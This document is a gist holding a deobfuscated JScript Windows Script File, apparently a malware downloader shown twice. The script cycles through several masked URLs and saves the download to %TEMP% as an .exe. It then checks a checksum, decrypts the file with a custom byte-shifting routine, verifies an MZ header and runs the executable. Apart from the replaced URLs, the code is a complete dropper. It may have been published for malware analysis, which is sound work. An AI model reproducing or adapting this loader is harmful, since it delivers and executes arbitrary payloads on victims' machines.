cryptobioz/profile-fully-unobfuscated.wsf Secret

## profile-fully-unobfuscated.wsf
<job><script language="JScript">


var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe";
// URLs have been, obviously, changed
var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"];
var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"];

for(var i=0;i<http_methods["length"];i++){
    try{
        var download_payload = WScript["CreateObject"](http_methods[i]);
        break;
    }catch(e){
        continue;
    }
};
var continuer = 1;
var j = 0;
while(continuer){
    try{
        if(1 == continuer){
            if(j >= urls["length"]){
                j = 0;
                WScript["Sleep"](1000);
            }
            download_payload["open"]("GET", urls[j++ % urls["length"]], false);
            download_payload["send"]();
        }
        if(download_payload.readystate < 4){
            WScript["Sleep"](100);
            continue;
        }
        var payload_file = WScript["CreateObject"]("ADODB.Stream");
        payload_file["open"]();
        payload_file["type"] = 1;
        payload_file["write"](download_payload["ResponseBody"]);
        payload_file["position"] = 0;
        payload_file["SaveToFile"](payload_path, 2);
        payload_file["close"]();

        var payload_content = read_payload(payload_path);
        payload_content = decrypt_payload(payload_content);
        if(payload_content["length"] < 102400 || payload_content["length"] > 235520 || !check_header(payload_content)){
            continuer = 1;
            continue;
        }
        try{
            save_decrypted_payload(payload_path, payload_content);
        }catch(e){
            break;
        };
        WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321");

    }catch(e){
        WScript["Sleep"](1000);
        continue;
    }
}


// LYUo
function read_payload(arg){
	var Vt = WScript["CreateObject"]("ADODB.Stream");
	Vt["type"]=2;
	Vt["Charset"] = "437";
	Vt["open"]();
	Vt["LoadFromFile"](arg);
	var k = Vt["ReadText"];
	Vt["close"]();
	return decode(k);
}

// NDn2
function decode(arg){
	var HOAt1 = new Array();
	HOAt1[0xC7]=0x80;
	HOAt1[0xFC]=0x81;
	HOAt1[0xE9]=0x82;
	HOAt1[0xE2]=0x83;
	HOAt1[0xE4]=0x84;
	HOAt1[0xE0]=0x85;
	HOAt1[0xE5]=0x86;
	HOAt1[0xE7]=0x87;
	HOAt1[0xEA]=0x88;
	HOAt1[0xEB]=0x89;
	HOAt1[0xE8]=0x8A;
	HOAt1[0xEF]=0x8B;
	HOAt1[0xEE]=0x8C;
	HOAt1[0xEC]=0x8D;
	HOAt1[0xC4]=0x8E;
	HOAt1[0xC5]=0x8F;
	HOAt1[0xC9]=0x90;
	HOAt1[0xE6]=0x91;
	HOAt1[0xC6]=0x92;
	HOAt1[0xF4]=0x93;
	HOAt1[0xF6]=0x94;
	HOAt1[0xF2]=0x95;
	HOAt1[0xFB]=0x96;
	HOAt1[0xF9]=0x97;
	HOAt1[0xFF]=0x98;
	HOAt1[0xD6]=0x99;
	HOAt1[0xDC]=0x9A;
	HOAt1[0xA2]=0x9B;
	HOAt1[0xA3]=0x9C;
	HOAt1[0xA5]=0x9D;
	HOAt1[0x20A7]=0x9E;
	HOAt1[0x192]=0x9F;
	HOAt1[0xE1]=0xA0;
	HOAt1[0xED]=0xA1;
	HOAt1[0xF3]=0xA2;
	HOAt1[0xFA]=0xA3;
	HOAt1[0xF1]=0xA4;
	HOAt1[0xD1]=0xA5;
	HOAt1[0xAA]=0xA6;
	HOAt1[0xBA]=0xA7;
	HOAt1[0xBF]=0xA8;
	HOAt1[0x2310]=0xA9;
	HOAt1[0xAC]=0xAA;
	HOAt1[0xBD]=0xAB;
	HOAt1[0xBC]=0xAC;
	HOAt1[0xA1]=0xAD;
	HOAt1[0xAB]=0xAE;
	HOAt1[0xBB]=0xAF;
	HOAt1[0x2591]=0xB0;
	HOAt1[0x2592]=0xB1;
	HOAt1[0x2593]=0xB2;
	HOAt1[0x2502]=0xB3;
	HOAt1[0x2524]=0xB4;
	HOAt1[0x2561]=0xB5;
	HOAt1[0x2562]=0xB6;
	HOAt1[0x2556]=0xB7;
	HOAt1[0x2555]=0xB8;
	HOAt1[0x2563]=0xB9;
	HOAt1[0x2551]=0xBA;
	HOAt1[0x2557]=0xBB;
	HOAt1[0x255D]=0xBC;
	HOAt1[0x255C]=0xBD;
	HOAt1[0x255B]=0xBE;
	HOAt1[0x2510]=0xBF;
	HOAt1[0x2514]=0xC0;
	HOAt1[0x2534]=0xC1;
	HOAt1[0x252C]=0xC2;
	HOAt1[0x251C]=0xC3;
	HOAt1[0x2500]=0xC4;
	HOAt1[0x253C]=0xC5;
	HOAt1[0x255E]=0xC6;
	HOAt1[0x255F]=0xC7;
	HOAt1[0x255A]=0xC8;
	HOAt1[0x2554]=0xC9;
	HOAt1[0x2569]=0xCA;
	HOAt1[0x2566]=0xCB;
	HOAt1[0x2560]=0xCC;
	HOAt1[0x2550]=0xCD;
	HOAt1[0x256C]=0xCE;
	HOAt1[0x2567]=0xCF;
	HOAt1[0x2568]=0xD0;
	HOAt1[0x2564]=0xD1;
	HOAt1[0x2565]=0xD2;
	HOAt1[0x2559]=0xD3;
	HOAt1[0x2558]=0xD4;
	HOAt1[0x2552]=0xD5;
	HOAt1[0x2553]=0xD6;
	HOAt1[0x256B]=0xD7;
	HOAt1[0x256A]=0xD8;
	HOAt1[0x2518]=0xD9;
	HOAt1[0x250C]=0xDA;
	HOAt1[0x2588]=0xDB;
	HOAt1[0x2584]=0xDC;
	HOAt1[0x258C]=0xDD;
	HOAt1[0x2590]=0xDE;
	HOAt1[0x2580]=0xDF;
	HOAt1[0x3B1]=0xE0;
	HOAt1[0xDF]=0xE1;
	HOAt1[0x393]=0xE2;
	HOAt1[0x3C0]=0xE3;
	HOAt1[0x3A3]=0xE4;
	HOAt1[0x3C3]=0xE5;
	HOAt1[0xB5]=0xE6;
	HOAt1[0x3C4]=0xE7;
	HOAt1[0x3A6]=0xE8;
	HOAt1[0x398]=0xE9;
	HOAt1[0x3A9]=0xEA;
	HOAt1[0x3B4]=0xEB;
	HOAt1[0x221E]=0xEC;
	HOAt1[0x3C6]=0xED;
	HOAt1[0x3B5]=0xEE;
	HOAt1[0x2229]=0xEF;
	HOAt1[0x2261]=0xF0;
	HOAt1[0xB1]=0xF1;
	HOAt1[0x2265]=0xF2;
	HOAt1[0x2264]=0xF3;
	HOAt1[0x2320]=0xF4;
	HOAt1[0x2321]=0xF5;
	HOAt1[0xF7]=0xF6;
	HOAt1[0x2248]=0xF7;
	HOAt1[0xB0]=0xF8;
	HOAt1[0x2219]=0xF9;
	HOAt1[0xB7]=0xFA;
	HOAt1[0x221A]=0xFB;
	HOAt1[0x207F]=0xFC;
	HOAt1[0xB2]=0xFD;
	HOAt1[0x25A0]=0xFE;
	HOAt1[0xA0]=0xFF;
	var arr2 = new Array();
	for(var i = 0;i<arg["length"];i++){
		var var2 = arg["charCodeAt"](i);
		if(var2 < 128){
			var var3 = var2;
		}else{
			var var3 = HOAt1[var2];
		}
		arr2["push"](var3);
	};
	return arr2;
};

// DTx
function decrypt_payload(arg){
	var v1;
	var v2 = arg[arg["length"]-4] | arg[arg["length"]-3] << 8 | arg[arg["length"]-2] << (-522 + 538) | arg[arg["length"]-1] << 24;
    arg["splice"](arg["length"]-4, 4);
    v1 = 40;
	for(var i=0;i<arg["length"];i++){
		v1 = (v1 + arg[i]) % 0x100000000;
	};
	if(v1 != v2){
		return [];
	}
	v3 = 30;
	arg = arg.reverse();
	for(var i = 0; i < arg["length"];i++){
		var v4 = arg[i] - v3;
		if(v4 < 0){
			v4 += 0x100;
		}
		arg[i] = v4;
		v3 = (v3 + 55) % 256;
	}
	return arg;
}

// Xu9
function check_header(arg){
	if(arg[0] == 0x4D && arg[1] == 0x5a){
		return true;
	}else{
		return false;
	}
}

// QMg4
function encode(arg){
	var BCm=new Array();
	BCm[0x80]=0x00C7;
	BCm[0x81]=0x00FC;
	BCm[0x82]=0x00E9;
	BCm[0x83]=0x00E2;
	BCm[0x84]=0x00E4;
	BCm[0x85]=0x00E0;
	BCm[0x86]=0x00E5;
	BCm[0x87]=0x00E7;
	BCm[0x88]=0x00EA;
	BCm[0x89]=0x00EB;
	BCm[0x8A]=0x00E8;
	BCm[0x8B]=0x00EF;
	BCm[0x8C]=0x00EE;
	BCm[0x8D]=0x00EC;
	BCm[0x8E]=0x00C4;
	BCm[0x8F]=0x00C5;
	BCm[0x90]=0x00C9;
	BCm[0x91]=0x00E6;
	BCm[0x92]=0x00C6;
	BCm[0x93]=0x00F4;
	BCm[0x94]=0x00F6;
	BCm[0x95]=0x00F2;
	BCm[0x96]=0x00FB;
	BCm[0x97]=0x00F9;
	BCm[0x98]=0x00FF;
	BCm[0x99]=0x00D6;
	BCm[0x9A]=0x00DC;
	BCm[0x9B]=0x00A2;
	BCm[0x9C]=0x00A3;
	BCm[0x9D]=0x00A5;
	BCm[0x9E]=0x20A7;
	BCm[0x9F]=0x0192;
	BCm[0xA0]=0x00E1;
	BCm[0xA1]=0x00ED;
	BCm[0xA2]=0x00F3;
	BCm[0xA3]=0x00FA;
	BCm[0xA4]=0x00F1;
	BCm[0xA5]=0x00D1;
	BCm[0xA6]=0x00AA;
	BCm[0xA7]=0x00BA;
	BCm[0xA8]=0x00BF;
	BCm[0xA9]=0x2310;
	BCm[0xAA]=0x00AC;
	BCm[0xAB]=0x00BD;
	BCm[0xAC]=0x00BC;
	BCm[0xAD]=0x00A1;
	BCm[0xAE]=0x00AB;
	BCm[0xAF]=0x00BB;
	BCm[0xB0]=0x2591;
	BCm[0xB1]=0x2592;
	BCm[0xB2]=0x2593;
	BCm[0xB3]=0x2502;
	BCm[0xB4]=0x2524;
	BCm[0xB5]=0x2561;
	BCm[0xB6]=0x2562;
	BCm[0xB7]=0x2556;
	BCm[0xB8]=0x2555;
	BCm[0xB9]=0x2563;
	BCm[0xBA]=0x2551;
	BCm[0xBB]=0x2557;
	BCm[0xBC]=0x255D;
	BCm[0xBD]=0x255C;
	BCm[0xBE]=0x255B;
	BCm[0xBF]=0x2510;
	BCm[0xC0]=0x2514;
	BCm[0xC1]=0x2534;
	BCm[0xC2]=0x252C;
	BCm[0xC3]=0x251C;
	BCm[0xC4]=0x2500;
	BCm[0xC5]=0x253C;
	BCm[0xC6]=0x255E;
	BCm[0xC7]=0x255F;
	BCm[0xC8]=0x255A;
	BCm[0xC9]=0x2554;
	BCm[0xCA]=0x2569;
	BCm[0xCB]=0x2566;
	BCm[0xCC]=0x2560;
	BCm[0xCD]=0x2550;
	BCm[0xCE]=0x256C;
	BCm[0xCF]=0x2567;
	BCm[0xD0]=0x2568;
	BCm[0xD1]=0x2564;
	BCm[0xD2]=0x2565;
	BCm[0xD3]=0x2559;
	BCm[0xD4]=0x2558;
	BCm[0xD5]=0x2552;
	BCm[0xD6]=0x2553;
	BCm[0xD7]=0x256B;
	BCm[0xD8]=0x256A;
	BCm[0xD9]=0x2518;
	BCm[0xDA]=0x250C;
	BCm[0xDB]=0x2588;
	BCm[0xDC]=0x2584;
	BCm[0xDD]=0x258C;
	BCm[0xDE]=0x2590;
	BCm[0xDF]=0x2580;
	BCm[0xE0]=0x03B1;
	BCm[0xE1]=0x00DF;
	BCm[0xE2]=0x0393;
	BCm[0xE3]=0x03C0;
	BCm[0xE4]=0x03A3;
	BCm[0xE5]=0x03C3;
	BCm[0xE6]=0x00B5;
	BCm[0xE7]=0x03C4;
	BCm[0xE8]=0x03A6;
	BCm[0xE9]=0x0398;
	BCm[0xEA]=0x03A9;
	BCm[0xEB]=0x03B4;
	BCm[0xEC]=0x221E;
	BCm[0xED]=0x03C6;
	BCm[0xEE]=0x03B5;
	BCm[0xEF]=0x2229;
	BCm[0xF0]=0x2261;
	BCm[0xF1]=0x00B1;
	BCm[0xF2]=0x2265;
	BCm[0xF3]=0x2264;
	BCm[0xF4]=0x2320;
	BCm[0xF5]=0x2321;
	BCm[0xF6]=0x00F7;
	BCm[0xF7]=0x2248;
	BCm[0xF8]=0x00B0;
	BCm[0xF9]=0x2219;
	BCm[0xFA]=0x00B7;
	BCm[0xFB]=0x221A;
	BCm[0xFC]=0x207F;
	BCm[0xFD]=0x00B2;
	BCm[0xFE]=0x25A0;
	BCm[0xFF]=0x00A0;

	var arr2 = new Array();
	var v1 = "";
	var v2;
    var v3;
	for(var i=0;i<arg["length"];i++){
		v2 = arg[i];
		if(v2 < 128){
			v3 = v2;
		}else{
			v3 = BCm[v2];
		}
		arr2.push(String["fromCharCode"](v3));
	}
	v1 = arr2["join"]("");
	return v1;
}

// LTs7
function save_decrypted_payload(payload_path, payload_content){
	var Vt = WScript["CreateObject"]("ADODB.Stream");
	Vt["type"] = 2;
	Vt["Charset"] = "437";
	Vt["open"]();
	Vt["writeText"](encode(payload_content));
	Vt["SaveToFile"](payload_path, 2);
	Vt["close"]();
};
</script></job>
	<job><script language="JScript">


	var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe";
	// URLs have been, obviously, changed
	var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"];
	var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"];

	for(var i=0;i<http_methods["length"];i++){
	try{
	var download_payload = WScript["CreateObject"](http_methods[i]);
	break;
	}catch(e){
	continue;
	}
	};
	var continuer = 1;
	var j = 0;
	while(continuer){
	try{
	if(1 == continuer){
	if(j >= urls["length"]){
	j = 0;
	WScript["Sleep"](1000);
	}
	download_payload["open"]("GET", urls[j++ % urls["length"]], false);
	download_payload["send"]();
	}
	if(download_payload.readystate < 4){
	WScript["Sleep"](100);
	continue;
	}
	var payload_file = WScript["CreateObject"]("ADODB.Stream");
	payload_file["open"]();
	payload_file["type"] = 1;
	payload_file["write"](download_payload["ResponseBody"]);
	payload_file["position"] = 0;
	payload_file["SaveToFile"](payload_path, 2);
	payload_file["close"]();

	var payload_content = read_payload(payload_path);
	payload_content = decrypt_payload(payload_content);
	if(payload_content["length"] < 102400 \|\| payload_content["length"] > 235520 \|\| !check_header(payload_content)){
	continuer = 1;
	continue;
	}
	try{
	save_decrypted_payload(payload_path, payload_content);
	}catch(e){
	break;
	};
	WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321");

	}catch(e){
	WScript["Sleep"](1000);
	continue;
	}
	}


	// LYUo
	function read_payload(arg){
	var Vt = WScript["CreateObject"]("ADODB.Stream");
	Vt["type"]=2;
	Vt["Charset"] = "437";
	Vt["open"]();
	Vt["LoadFromFile"](arg);
	var k = Vt["ReadText"];
	Vt["close"]();
	return decode(k);
	}

	// NDn2
	function decode(arg){
	var HOAt1 = new Array();
	HOAt1[0xC7]=0x80;
	HOAt1[0xFC]=0x81;
	HOAt1[0xE9]=0x82;
	HOAt1[0xE2]=0x83;
	HOAt1[0xE4]=0x84;
	HOAt1[0xE0]=0x85;
	HOAt1[0xE5]=0x86;
	HOAt1[0xE7]=0x87;
	HOAt1[0xEA]=0x88;
	HOAt1[0xEB]=0x89;
	HOAt1[0xE8]=0x8A;
	HOAt1[0xEF]=0x8B;
	HOAt1[0xEE]=0x8C;
	HOAt1[0xEC]=0x8D;
	HOAt1[0xC4]=0x8E;
	HOAt1[0xC5]=0x8F;
	HOAt1[0xC9]=0x90;
	HOAt1[0xE6]=0x91;
	HOAt1[0xC6]=0x92;
	HOAt1[0xF4]=0x93;
	HOAt1[0xF6]=0x94;
	HOAt1[0xF2]=0x95;
	HOAt1[0xFB]=0x96;
	HOAt1[0xF9]=0x97;
	HOAt1[0xFF]=0x98;
	HOAt1[0xD6]=0x99;
	HOAt1[0xDC]=0x9A;
	HOAt1[0xA2]=0x9B;
	HOAt1[0xA3]=0x9C;
	HOAt1[0xA5]=0x9D;
	HOAt1[0x20A7]=0x9E;
	HOAt1[0x192]=0x9F;
	HOAt1[0xE1]=0xA0;
	HOAt1[0xED]=0xA1;
	HOAt1[0xF3]=0xA2;
	HOAt1[0xFA]=0xA3;
	HOAt1[0xF1]=0xA4;
	HOAt1[0xD1]=0xA5;
	HOAt1[0xAA]=0xA6;
	HOAt1[0xBA]=0xA7;
	HOAt1[0xBF]=0xA8;
	HOAt1[0x2310]=0xA9;
	HOAt1[0xAC]=0xAA;
	HOAt1[0xBD]=0xAB;
	HOAt1[0xBC]=0xAC;
	HOAt1[0xA1]=0xAD;
	HOAt1[0xAB]=0xAE;
	HOAt1[0xBB]=0xAF;
	HOAt1[0x2591]=0xB0;
	HOAt1[0x2592]=0xB1;
	HOAt1[0x2593]=0xB2;
	HOAt1[0x2502]=0xB3;
	HOAt1[0x2524]=0xB4;
	HOAt1[0x2561]=0xB5;
	HOAt1[0x2562]=0xB6;
	HOAt1[0x2556]=0xB7;
	HOAt1[0x2555]=0xB8;
	HOAt1[0x2563]=0xB9;
	HOAt1[0x2551]=0xBA;
	HOAt1[0x2557]=0xBB;
	HOAt1[0x255D]=0xBC;
	HOAt1[0x255C]=0xBD;
	HOAt1[0x255B]=0xBE;
	HOAt1[0x2510]=0xBF;
	HOAt1[0x2514]=0xC0;
	HOAt1[0x2534]=0xC1;
	HOAt1[0x252C]=0xC2;
	HOAt1[0x251C]=0xC3;
	HOAt1[0x2500]=0xC4;
	HOAt1[0x253C]=0xC5;
	HOAt1[0x255E]=0xC6;
	HOAt1[0x255F]=0xC7;
	HOAt1[0x255A]=0xC8;
	HOAt1[0x2554]=0xC9;
	HOAt1[0x2569]=0xCA;
	HOAt1[0x2566]=0xCB;
	HOAt1[0x2560]=0xCC;
	HOAt1[0x2550]=0xCD;
	HOAt1[0x256C]=0xCE;
	HOAt1[0x2567]=0xCF;
	HOAt1[0x2568]=0xD0;
	HOAt1[0x2564]=0xD1;
	HOAt1[0x2565]=0xD2;
	HOAt1[0x2559]=0xD3;
	HOAt1[0x2558]=0xD4;
	HOAt1[0x2552]=0xD5;
	HOAt1[0x2553]=0xD6;
	HOAt1[0x256B]=0xD7;
	HOAt1[0x256A]=0xD8;
	HOAt1[0x2518]=0xD9;
	HOAt1[0x250C]=0xDA;
	HOAt1[0x2588]=0xDB;
	HOAt1[0x2584]=0xDC;
	HOAt1[0x258C]=0xDD;
	HOAt1[0x2590]=0xDE;
	HOAt1[0x2580]=0xDF;
	HOAt1[0x3B1]=0xE0;
	HOAt1[0xDF]=0xE1;
	HOAt1[0x393]=0xE2;
	HOAt1[0x3C0]=0xE3;
	HOAt1[0x3A3]=0xE4;
	HOAt1[0x3C3]=0xE5;
	HOAt1[0xB5]=0xE6;
	HOAt1[0x3C4]=0xE7;
	HOAt1[0x3A6]=0xE8;
	HOAt1[0x398]=0xE9;
	HOAt1[0x3A9]=0xEA;
	HOAt1[0x3B4]=0xEB;
	HOAt1[0x221E]=0xEC;
	HOAt1[0x3C6]=0xED;
	HOAt1[0x3B5]=0xEE;
	HOAt1[0x2229]=0xEF;
	HOAt1[0x2261]=0xF0;
	HOAt1[0xB1]=0xF1;
	HOAt1[0x2265]=0xF2;
	HOAt1[0x2264]=0xF3;
	HOAt1[0x2320]=0xF4;
	HOAt1[0x2321]=0xF5;
	HOAt1[0xF7]=0xF6;
	HOAt1[0x2248]=0xF7;
	HOAt1[0xB0]=0xF8;
	HOAt1[0x2219]=0xF9;
	HOAt1[0xB7]=0xFA;
	HOAt1[0x221A]=0xFB;
	HOAt1[0x207F]=0xFC;
	HOAt1[0xB2]=0xFD;
	HOAt1[0x25A0]=0xFE;
	HOAt1[0xA0]=0xFF;
	var arr2 = new Array();
	for(var i = 0;i<arg["length"];i++){
	var var2 = arg["charCodeAt"](i);
	if(var2 < 128){
	var var3 = var2;
	}else{
	var var3 = HOAt1[var2];
	}
	arr2["push"](var3);
	};
	return arr2;
	};

	// DTx
	function decrypt_payload(arg){
	var v1;
	var v2 = arg[arg["length"]-4] \| arg[arg["length"]-3] << 8 \| arg[arg["length"]-2] << (-522 + 538) \| arg[arg["length"]-1] << 24;
	arg["splice"](arg["length"]-4, 4);
	v1 = 40;
	for(var i=0;i<arg["length"];i++){
	v1 = (v1 + arg[i]) % 0x100000000;
	};
	if(v1 != v2){
	return [];
	}
	v3 = 30;
	arg = arg.reverse();
	for(var i = 0; i < arg["length"];i++){
	var v4 = arg[i] - v3;
	if(v4 < 0){
	v4 += 0x100;
	}
	arg[i] = v4;
	v3 = (v3 + 55) % 256;
	}
	return arg;
	}

	// Xu9
	function check_header(arg){
	if(arg[0] == 0x4D && arg[1] == 0x5a){
	return true;
	}else{
	return false;
	}
	}

	// QMg4
	function encode(arg){
	var BCm=new Array();
	BCm[0x80]=0x00C7;
	BCm[0x81]=0x00FC;
	BCm[0x82]=0x00E9;
	BCm[0x83]=0x00E2;
	BCm[0x84]=0x00E4;
	BCm[0x85]=0x00E0;
	BCm[0x86]=0x00E5;
	BCm[0x87]=0x00E7;
	BCm[0x88]=0x00EA;
	BCm[0x89]=0x00EB;
	BCm[0x8A]=0x00E8;
	BCm[0x8B]=0x00EF;
	BCm[0x8C]=0x00EE;
	BCm[0x8D]=0x00EC;
	BCm[0x8E]=0x00C4;
	BCm[0x8F]=0x00C5;
	BCm[0x90]=0x00C9;
	BCm[0x91]=0x00E6;
	BCm[0x92]=0x00C6;
	BCm[0x93]=0x00F4;
	BCm[0x94]=0x00F6;
	BCm[0x95]=0x00F2;
	BCm[0x96]=0x00FB;
	BCm[0x97]=0x00F9;
	BCm[0x98]=0x00FF;
	BCm[0x99]=0x00D6;
	BCm[0x9A]=0x00DC;
	BCm[0x9B]=0x00A2;
	BCm[0x9C]=0x00A3;
	BCm[0x9D]=0x00A5;
	BCm[0x9E]=0x20A7;
	BCm[0x9F]=0x0192;
	BCm[0xA0]=0x00E1;
	BCm[0xA1]=0x00ED;
	BCm[0xA2]=0x00F3;
	BCm[0xA3]=0x00FA;
	BCm[0xA4]=0x00F1;
	BCm[0xA5]=0x00D1;
	BCm[0xA6]=0x00AA;
	BCm[0xA7]=0x00BA;
	BCm[0xA8]=0x00BF;
	BCm[0xA9]=0x2310;
	BCm[0xAA]=0x00AC;
	BCm[0xAB]=0x00BD;
	BCm[0xAC]=0x00BC;
	BCm[0xAD]=0x00A1;
	BCm[0xAE]=0x00AB;
	BCm[0xAF]=0x00BB;
	BCm[0xB0]=0x2591;
	BCm[0xB1]=0x2592;
	BCm[0xB2]=0x2593;
	BCm[0xB3]=0x2502;
	BCm[0xB4]=0x2524;
	BCm[0xB5]=0x2561;
	BCm[0xB6]=0x2562;
	BCm[0xB7]=0x2556;
	BCm[0xB8]=0x2555;
	BCm[0xB9]=0x2563;
	BCm[0xBA]=0x2551;
	BCm[0xBB]=0x2557;
	BCm[0xBC]=0x255D;
	BCm[0xBD]=0x255C;
	BCm[0xBE]=0x255B;
	BCm[0xBF]=0x2510;
	BCm[0xC0]=0x2514;
	BCm[0xC1]=0x2534;
	BCm[0xC2]=0x252C;
	BCm[0xC3]=0x251C;
	BCm[0xC4]=0x2500;
	BCm[0xC5]=0x253C;
	BCm[0xC6]=0x255E;
	BCm[0xC7]=0x255F;
	BCm[0xC8]=0x255A;
	BCm[0xC9]=0x2554;
	BCm[0xCA]=0x2569;
	BCm[0xCB]=0x2566;
	BCm[0xCC]=0x2560;
	BCm[0xCD]=0x2550;
	BCm[0xCE]=0x256C;
	BCm[0xCF]=0x2567;
	BCm[0xD0]=0x2568;
	BCm[0xD1]=0x2564;
	BCm[0xD2]=0x2565;
	BCm[0xD3]=0x2559;
	BCm[0xD4]=0x2558;
	BCm[0xD5]=0x2552;
	BCm[0xD6]=0x2553;
	BCm[0xD7]=0x256B;
	BCm[0xD8]=0x256A;
	BCm[0xD9]=0x2518;
	BCm[0xDA]=0x250C;
	BCm[0xDB]=0x2588;
	BCm[0xDC]=0x2584;
	BCm[0xDD]=0x258C;
	BCm[0xDE]=0x2590;
	BCm[0xDF]=0x2580;
	BCm[0xE0]=0x03B1;
	BCm[0xE1]=0x00DF;
	BCm[0xE2]=0x0393;
	BCm[0xE3]=0x03C0;
	BCm[0xE4]=0x03A3;
	BCm[0xE5]=0x03C3;
	BCm[0xE6]=0x00B5;
	BCm[0xE7]=0x03C4;
	BCm[0xE8]=0x03A6;
	BCm[0xE9]=0x0398;
	BCm[0xEA]=0x03A9;
	BCm[0xEB]=0x03B4;
	BCm[0xEC]=0x221E;
	BCm[0xED]=0x03C6;
	BCm[0xEE]=0x03B5;
	BCm[0xEF]=0x2229;
	BCm[0xF0]=0x2261;
	BCm[0xF1]=0x00B1;
	BCm[0xF2]=0x2265;
	BCm[0xF3]=0x2264;
	BCm[0xF4]=0x2320;
	BCm[0xF5]=0x2321;
	BCm[0xF6]=0x00F7;
	BCm[0xF7]=0x2248;
	BCm[0xF8]=0x00B0;
	BCm[0xF9]=0x2219;
	BCm[0xFA]=0x00B7;
	BCm[0xFB]=0x221A;
	BCm[0xFC]=0x207F;
	BCm[0xFD]=0x00B2;
	BCm[0xFE]=0x25A0;
	BCm[0xFF]=0x00A0;

	var arr2 = new Array();
	var v1 = "";
	var v2;
	var v3;
	for(var i=0;i<arg["length"];i++){
	v2 = arg[i];
	if(v2 < 128){
	v3 = v2;
	}else{
	v3 = BCm[v2];
	}
	arr2.push(String["fromCharCode"](v3));
	}
	v1 = arr2["join"]("");
	return v1;
	}

	// LTs7
	function save_decrypted_payload(payload_path, payload_content){
	var Vt = WScript["CreateObject"]("ADODB.Stream");
	Vt["type"] = 2;
	Vt["Charset"] = "437";
	Vt["open"]();
	Vt["writeText"](encode(payload_content));
	Vt["SaveToFile"](payload_path, 2);
	Vt["close"]();
	};
	</script></job>